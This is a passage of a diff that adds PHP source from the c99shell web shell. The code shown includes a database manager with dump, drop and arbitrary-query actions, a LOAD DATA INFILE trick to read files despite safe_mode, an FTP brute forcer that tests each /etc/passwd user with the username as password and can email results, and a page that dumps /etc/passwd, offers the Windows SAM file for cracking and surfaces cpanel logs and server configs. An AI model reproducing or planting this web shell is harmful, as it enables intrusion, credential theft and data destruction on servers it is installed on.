value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; + echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; + $v = join (";",$dmptbls); + echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; + echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; + echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; + echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; + echo "</form>"; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; + } + } + else {echo "<b>Dump: nothing to do!</b>";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "<br><br><b>Inserting row into table:</b><br>"; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; + $i++; + } + echo "</table><br>"; + echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; + if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} + echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "<hr size=\"1\" noshade>"; + echo "[Pages]&nbsp;"; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} + else {echo "&nbsp;";} + } + if ($i == 0) {echo "empty";} + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; + for ($i=0;$i<mysql_num_fields($result);$i++) + { + $v = mysql_field_name($result,$i); + if ($e[0] == "a") {$s = "d"; $m = "asc";} + else {$s = "a"; $m = "desc";} + echo "<td>"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} + else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";} + echo "</td>"; + } + echo "<td><font color=\"green\"><b>Action</b></font></td>"; + echo "</tr>"; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo "<tr>"; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "<font color=\"green\">NULL</font>";} + echo "<td>".$v."</td>"; + $i++; + } + echo "<td>"; + echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;"; + echo "</td>"; + echo "</tr>"; + } + mysql_free_result($result); + echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"deleterow\">Delete</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; + echo "<td>".$row["Rows"]."</td>"; + echo "<td>".$row["Type"]."</td>"; + echo "<td>".$row["Create_time"]."</td>"; + echo "<td>".$row["Update_time"]."</td>"; + echo "<td>".$size."</td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>?/b></center></td>"; + echo "<td><center><b>".$i." table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"tbldrop\">Drop</option>"; + echo "<option value=\"tblempty\">Empty</option>"; + echo "<option value=\"tbldump\">Dump</option>"; + echo "<option value=\"tblcheck\">Check table</option>"; + echo "<option value=\"tbloptimize\">Optimize table</option>"; + echo "<option value=\"tblrepair\">Repair table</option>"; + echo "<option value=\"tblanalyze\">Analyze table</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DataBase:</b> + <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } + if (!empty($sql_act)) + { + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>Processes:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} + else + { + for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} + $f = ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} + if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} + else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "</td></tr></table>"; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; + } + echo "</table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} + elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} + echo "<br><br>"; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>FTP Brute Forcer: </b><br>"; + if (!win) {echo "This functions not work in Windows!<br><br>";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} + else + { + echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "<center><b>Server Information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "<b>*nix /etc/passwd:</b><br>"; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; + echo join(":",$uid)."<br>"; + } + $i++; + } + } + else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "</br><b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?</font></b><br>";} + } + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} + if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = 